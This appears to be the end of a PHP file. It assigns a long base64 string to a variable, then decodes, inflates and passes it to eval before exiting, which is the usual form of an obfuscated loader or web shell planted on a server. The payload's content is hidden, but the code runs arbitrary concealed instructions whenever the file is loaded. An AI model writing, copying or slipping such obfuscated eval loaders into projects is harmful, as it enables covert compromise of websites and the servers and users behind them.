xX33Kr+J35K7MA7+0A0Nj/pbMBUftajHL9HSuwfaommg0YUzDr2ImjiD9CnO2bTQRGDG3YCnCtOoyu192j7CfTcocMtJ3WklJUAN0WPpTJUXr7L+bAb5Ky2GAzgfQKOkPbCPpkF8nBuN8bKQlW4MugB3DofhHKvhrLU3wuibDte8+b2M+VUQLNf8+UaIk6eGxYC2dul5Kr+YlLHUyGEXA6fes1/tr7zeFV3buLRmEsVkrjL2A0xBUu66K+d1VUmCU0zithENB4spI/wh4MV3zTtgbDCHv7hPIu26vKelV0fTr1zklAErdAwTAypUqq/lvdS64HuUws/13znWWl5SVibjk5SBNnJhvJJhP5wmtbJlof2xlZpBl1gFb/g/zc4/DGt9cppV7cin8f2AYBwJeyTZDrFg8P2AcBIviNUXA";
eval(htmlspecialchars_decode(gzinflate(base64_decode($xNot))));
exit;
?>